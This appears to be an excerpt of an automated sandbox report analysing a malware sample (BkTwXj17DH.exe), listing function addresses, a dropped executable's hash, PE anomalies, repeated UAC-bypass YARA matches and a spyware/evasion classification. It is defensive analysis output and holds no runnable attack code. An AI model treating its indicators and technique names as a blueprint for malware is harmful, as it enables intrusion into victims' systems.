Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA30B5B0	3_2_00007FFBAA30B5B0
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA316680	3_2_00007FFBAA316680
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: 3_2_00007FFBAA304690	3_2_00007FFBAA304690
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414B5C0	4_2_00007FF7F414B5C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414F6C0	4_2_00007FF7F414F6C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4139750	4_2_00007FF7F4139750
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4165750	4_2_00007FF7F4165750
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F415D790	4_2_00007FF7F415D790
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414D790	4_2_00007FF7F414D790
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D848	4_2_00007FF7F411D848
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D866	4_2_00007FF7F411D866
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D8CE	4_2_00007FF7F411D8CE
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D8A0	4_2_00007FF7F411D8A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D912	4_2_00007FF7F411D912
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41238F0	4_2_00007FF7F41238F0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D8F4	4_2_00007FF7F411D8F4
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D140	4_2_00007FF7F411D140
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414D187	4_2_00007FF7F414D187
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F415B1A0	4_2_00007FF7F415B1A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F412D220	4_2_00007FF7F412D220
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4135260	4_2_00007FF7F4135260
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41433E0	4_2_00007FF7F41433E0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41674C0	4_2_00007FF7F41674C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414D4F0	4_2_00007FF7F414D4F0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4111D30	4_2_00007FF7F4111D30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4149D30	4_2_00007FF7F4149D30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414BDD0	4_2_00007FF7F414BDD0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4155E30	4_2_00007FF7F4155E30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4139F20	4_2_00007FF7F4139F20
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4115F60	4_2_00007FF7F4115F60
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4127FD0	4_2_00007FF7F4127FD0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4125FA0	4_2_00007FF7F4125FA0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4137FF0	4_2_00007FF7F4137FF0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4134050	4_2_00007FF7F4134050
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41240A0	4_2_00007FF7F41240A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D938	4_2_00007FF7F411D938
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D982	4_2_00007FF7F411D982
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4135980	4_2_00007FF7F4135980
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4155990	4_2_00007FF7F4155990
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4137960	4_2_00007FF7F4137960
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D964	4_2_00007FF7F411D964
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D9BC	4_2_00007FF7F411D9BC
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F416B9B0	4_2_00007FF7F416B9B0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411D9F6	4_2_00007FF7F411D9F6
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DA48	4_2_00007FF7F411DA48
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DA1C	4_2_00007FF7F411DA1C
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DA82	4_2_00007FF7F411DA82
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4125A70	4_2_00007FF7F4125A70
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DAD6	4_2_00007FF7F411DAD6
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DAB0	4_2_00007FF7F411DAB0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4121B00	4_2_00007FF7F4121B00
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DB0B	4_2_00007FF7F411DB0B
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4153AF0	4_2_00007FF7F4153AF0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4115B30	4_2_00007FF7F4115B30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DB34	4_2_00007FF7F411DB34
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411DB5B	4_2_00007FF7F411DB5B
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4157BC0	4_2_00007FF7F4157BC0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4147BB0	4_2_00007FF7F4147BB0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F413BC00	4_2_00007FF7F413BC00
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41305C0	4_2_00007FF7F41305C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41185A0	4_2_00007FF7F41185A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411A620	4_2_00007FF7F411A620
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4132660	4_2_00007FF7F4132660
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41526F7	4_2_00007FF7F41526F7
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F412C700	4_2_00007FF7F412C700
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4128720	4_2_00007FF7F4128720
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4126810	4_2_00007FF7F4126810
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414E850	4_2_00007FF7F414E850
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4164830	4_2_00007FF7F4164830
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4158880	4_2_00007FF7F4158880
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4136890	4_2_00007FF7F4136890
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41308C0	4_2_00007FF7F41308C0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41248A0	4_2_00007FF7F41248A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411A140	4_2_00007FF7F411A140
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414A250	4_2_00007FF7F414A250
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4166260	4_2_00007FF7F4166260
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F41623D0	4_2_00007FF7F41623D0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F415E3D0	4_2_00007FF7F415E3D0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4124440	4_2_00007FF7F4124440
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4168430	4_2_00007FF7F4168430
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F415C500	4_2_00007FF7F415C500
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4112D30	4_2_00007FF7F4112D30
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4152DC0	4_2_00007FF7F4152DC0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4136DA0	4_2_00007FF7F4136DA0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F412AF40	4_2_00007FF7F412AF40
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414EF40	4_2_00007FF7F414EF40
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F413AFC0	4_2_00007FF7F413AFC0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4128FF0	4_2_00007FF7F4128FF0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4167030	4_2_00007FF7F4167030
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4151030	4_2_00007FF7F4151030
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F413D0B0	4_2_00007FF7F413D0B0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F412E9A0	4_2_00007FF7F412E9A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4128A00	4_2_00007FF7F4128A00
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F414AA00	4_2_00007FF7F414AA00
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4166A10	4_2_00007FF7F4166A10
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4114A90	4_2_00007FF7F4114A90
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4160B10	4_2_00007FF7F4160B10
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4120AE0	4_2_00007FF7F4120AE0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F411EBE0	4_2_00007FF7F411EBE0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F413CC90	4_2_00007FF7F413CC90
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4138C60	4_2_00007FF7F4138C60
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4168CC0	4_2_00007FF7F4168CC0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FF7F4154CA0	4_2_00007FF7F4154CA0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81728F0	4_2_00007FFBA81728F0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815C920	4_2_00007FFBA815C920
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA818AA0C	4_2_00007FFBA818AA0C
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8176A48	4_2_00007FFBA8176A48
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8174AD0	4_2_00007FFBA8174AD0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815EB40	4_2_00007FFBA815EB40
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA817AB20	4_2_00007FFBA817AB20
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8184D00	4_2_00007FFBA8184D00
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8170D40	4_2_00007FFBA8170D40
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8174F10	4_2_00007FFBA8174F10
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA816AFA0	4_2_00007FFBA816AFA0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8182FF0	4_2_00007FFBA8182FF0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA816C110	4_2_00007FFBA816C110
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8190156	4_2_00007FFBA8190156
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81663C8	4_2_00007FFBA81663C8
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA816E430	4_2_00007FFBA816E430
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA818C520	4_2_00007FFBA818C520
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8186680	4_2_00007FFBA8186680
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8174690	4_2_00007FFBA8174690
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81626A0	4_2_00007FFBA81626A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8166748	4_2_00007FFBA8166748
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815DA20	4_2_00007FFBA815DA20
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8175BC0	4_2_00007FFBA8175BC0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815FCD0	4_2_00007FFBA815FCD0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8189D38	4_2_00007FFBA8189D38
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA818BE28	4_2_00007FFBA818BE28
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8166070	4_2_00007FFBA8166070
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA816D280	4_2_00007FFBA816D280
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81712A0	4_2_00007FFBA81712A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81772FC	4_2_00007FFBA81772FC
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81693A0	4_2_00007FFBA81693A0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81854D0	4_2_00007FFBA81854D0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA815B4B8	4_2_00007FFBA815B4B8
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA81834F8	4_2_00007FFBA81834F8
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA817B5B0	4_2_00007FFBA817B5B0
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: 4_2_00007FFBA8169850	4_2_00007FFBA8169850

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe B22BF1210B5FD173A210EBFA9092390AA0513C41E1914CBE161EB547F049EF91

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: String function: 005032F3 appears 85 times
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: String function: 00500726 appears 34 times
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: String function: 00500237 appears 683 times
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: String function: 004C3821 appears 501 times
Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: String function: 004C1F13 appears 54 times
Source: C:\Windows\Temp\{7A5053FB-AE83-49EB-B4D9-00B61214CD20}\.ba\ActiveISO.exe	Code function: String function: 00007FF72A93B3F0 appears 49 times
Source: C:\Users\user\AppData\Roaming\MonitorBrowser2\ActiveISO.exe	Code function: String function: 00007FF7F414B3F0 appears 49 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 00D90726 appears 34 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 6FFF7190 appears 35 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 00D53821 appears 501 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 00D51F13 appears 54 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 00D90237 appears 683 times
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: String function: 00D932F3 appears 83 times

Source: UploadAlt_Ti.exe.5.dr

Static PE information: Resource name: ZIP type: Zip archive data (empty)

Source: xsnxlhd.5.dr	Static PE information: Number of sections : 12 > 10
Source: dykhaneiil.19.dr	Static PE information: Number of sections : 12 > 10

Source: BkTwXj17DH.exe, 00000000.00000002.1476856242.000000000052D000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenametrain.exe0 vs BkTwXj17DH.exe
Source: BkTwXj17DH.exe, 00000002.00000000.1420339021.0000000000DBD000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenametrain.exe0 vs BkTwXj17DH.exe
Source: BkTwXj17DH.exe, 00000002.00000002.1473974077.000000007001C000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilenamesharefolders.dllF vs BkTwXj17DH.exe
Source: BkTwXj17DH.exe, 00000002.00000003.1434561495.0000000000F45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs BkTwXj17DH.exe

Source: BkTwXj17DH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP

Source: 9.2.UploadAlt_Ti.exe.26cc6ed.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.UploadAlt_Ti.exe.275f6ed.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.cmd.exe.4d8cacd.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.56cfacd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4d5e6cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4d5dacd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.UploadAlt_Ti.exe.2719a20.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 19.2.cmd.exe.4d18a00.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.36707f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 23.2.UploadAlt_Ti.exe.275eaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.UploadAlt_Ti.exe.26cbaed.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 9.2.UploadAlt_Ti.exe.2686a20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.cmd.exe.4d8d6cd.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 5.2.cmd.exe.4d47a00.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.568aa00.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.cmd.exe.56d06cd.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: ActiveISO.exe, 00000003.00000002.1463442325.00007FFBA9AA1000.00000002.00000001.01000000.0000000C.sdmp, ActiveISO.exe, 00000004.00000002.1531943131.00007FFBA84C1000.00000002.00000001.01000000.00000018.sdmp

Binary or memory string: com.slnishinomiya.hyogo.jpkustanai.rucom.snpassenger-association.aerocom.sotsushima.nagasaki.jpcom.stuy.comx.seisa-geek.comcom.sv

Source: classification engine

Classification label: mal100.spyw.expl.evad.winEXE@22/35@2/1

Source: C:\Users\user\Desktop\BkTwXj17DH.exe

Code function: 0_2_004FFE21 FormatMessageW,GetLastError,LocalFree,

0_2_004FFE21

Source: C:\Users\user\Desktop\BkTwXj17DH.exe	Code function: 0_2_004C45EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	0_2_004C45EE
Source: C:\Windows\Temp\{BDCC5E07-EAB6-499D-B22D-060DB63D60C8}\.cr\BkTwXj17DH.exe	Code function: 2_2_00D545EE GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,Sleep,InitiateSystemShutdownExW,GetLastError,CloseHandle,	2_2_00D545EE
